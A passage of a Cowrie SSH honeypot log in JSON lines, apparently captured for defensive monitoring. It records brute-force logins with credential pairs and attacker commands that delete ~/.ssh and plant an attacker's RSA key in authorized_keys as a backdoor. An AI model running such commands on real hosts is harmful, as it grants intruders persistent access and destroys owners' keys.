{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":34834,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cb0b7046e7a","protocol":"ssh","message":"New connection: 36.89.28.139:34834 (1.2.3.4:22) [session: 5cb0b7046e7a]","sensor":"my-vps","timestamp":"2025-08-26T00:51:15.294386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:51:15.295217Z","src_ip":"36.89.28.139","session":"5cb0b7046e7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:51:15.466158Z","src_ip":"27.112.78.170","session":"2657057ec537"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:51:15.502132Z","src_ip":"36.89.28.139","session":"5cb0b7046e7a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:51:16.577040Z","src_ip":"27.112.78.170","session":"2657057ec537"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:51:16.902772Z","src_ip":"36.89.28.139","session":"5cb0b7046e7a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:17.847396Z","src_ip":"27.112.78.170","session":"2657057ec537"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:18.098911Z","src_ip":"36.89.28.139","session":"5cb0b7046e7a"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":58438,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb066600095e","protocol":"ssh","message":"New connection: 27.112.78.170:58438 (1.2.3.4:22) [session: fb066600095e]","sensor":"my-vps","timestamp":"2025-08-26T00:51:18.104827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:51:18.106586Z","src_ip":"27.112.78.170","session":"fb066600095e"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":43504,"dst_ip":"1.2.3.4","dst_port":22,"session":"da06eae6d692","protocol":"ssh","message":"New connection: 24.108.102.132:43504 (1.2.3.4:22) [session: da06eae6d692]","sensor":"my-vps","timestamp":"2025-08-26T00:51:18.238480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:51:18.243709Z","src_ip":"24.108.102.132","session":"da06eae6d692"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":34842,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5765879de1a","protocol":"ssh","message":"New connection: 36.89.28.139:34842 (1.2.3.4:22) [session: c5765879de1a]","sensor":"my-vps","timestamp":"2025-08-26T00:51:18.260063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:51:18.261194Z","src_ip":"36.89.28.139","session":"c5765879de1a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:51:18.364542Z","src_ip":"27.112.78.170","session":"fb066600095e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:51:18.411031Z","src_ip":"24.108.102.132","session":"da06eae6d692"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:51:18.442434Z","src_ip":"36.89.28.139","session":"c5765879de1a"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty321","message":"login attempt [root/qwerty321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:51:19.072948Z","src_ip":"24.108.102.132","session":"da06eae6d692"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:51:19.191130Z","src_ip":"36.89.28.139","session":"c5765879de1a"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:19.369614Z","src_ip":"36.89.28.139","session":"1f2bcb3841cc"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:19.370763Z","src_ip":"36.89.28.139","session":"c5765879de1a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:51:19.400459Z","src_ip":"27.112.78.170","session":"fb066600095e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:51:19.471443Z","src_ip":"24.108.102.132","session":"da06eae6d692"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:51:19.472266Z","src_ip":"24.108.102.132","session":"da06eae6d692"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:51:19.473233Z","src_ip":"24.108.102.132","session":"da06eae6d692"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:19.638185Z","src_ip":"24.108.102.132","session":"da06eae6d692"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:19.660743Z","src_ip":"27.112.78.170","session":"fb066600095e"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:19.661806Z","src_ip":"27.112.78.170","session":"4c8c77e30775"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":39132,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e5d9926d147","protocol":"ssh","message":"New connection: 45.159.112.103:39132 (1.2.3.4:22) [session: 4e5d9926d147]","sensor":"my-vps","timestamp":"2025-08-26T00:51:19.727140Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:51:19.728176Z","src_ip":"45.159.112.103","session":"4e5d9926d147"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:51:19.839080Z","src_ip":"45.159.112.103","session":"4e5d9926d147"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:51:20.046784Z","src_ip":"24.108.102.132","session":"da06eae6d692"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:51:20.047510Z","src_ip":"24.108.102.132","session":"da06eae6d692"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:51:20.212801Z","src_ip":"24.108.102.132","session":"da06eae6d692"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:20.213827Z","src_ip":"24.108.102.132","session":"da06eae6d692"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":43518,"dst_ip":"1.2.3.4","dst_port":22,"session":"26ec7f763c2e","protocol":"ssh","message":"New connection: 24.108.102.132:43518 (1.2.3.4:22) [session: 26ec7f763c2e]","sensor":"my-vps","timestamp":"2025-08-26T00:51:20.363585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:51:20.368817Z","src_ip":"24.108.102.132","session":"26ec7f763c2e"}
{"eventid":"cowrie.login.success","username":"root","password":"001002","message":"login attempt [root/001002] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:51:20.421079Z","src_ip":"45.159.112.103","session":"4e5d9926d147"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:51:20.531793Z","src_ip":"24.108.102.132","session":"26ec7f763c2e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:51:20.662446Z","src_ip":"45.159.112.103","session":"4e5d9926d147"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:51:20.663214Z","src_ip":"45.159.112.103","session":"4e5d9926d147"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:51:20.664229Z","src_ip":"45.159.112.103","session":"4e5d9926d147"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:20.776722Z","src_ip":"45.159.112.103","session":"4e5d9926d147"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:51:21.123577Z","src_ip":"45.159.112.103","session":"4e5d9926d147"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:51:21.124572Z","src_ip":"45.159.112.103","session":"4e5d9926d147"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:51:21.202050Z","src_ip":"24.108.102.132","session":"26ec7f763c2e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:51:21.238382Z","src_ip":"45.159.112.103","session":"4e5d9926d147"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:21.239303Z","src_ip":"45.159.112.103","session":"4e5d9926d147"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":39136,"dst_ip":"1.2.3.4","dst_port":22,"session":"2624434042c1","protocol":"ssh","message":"New connection: 45.159.112.103:39136 (1.2.3.4:22) [session: 2624434042c1]","sensor":"my-vps","timestamp":"2025-08-26T00:51:21.345466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:51:21.346504Z","src_ip":"45.159.112.103","session":"2624434042c1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh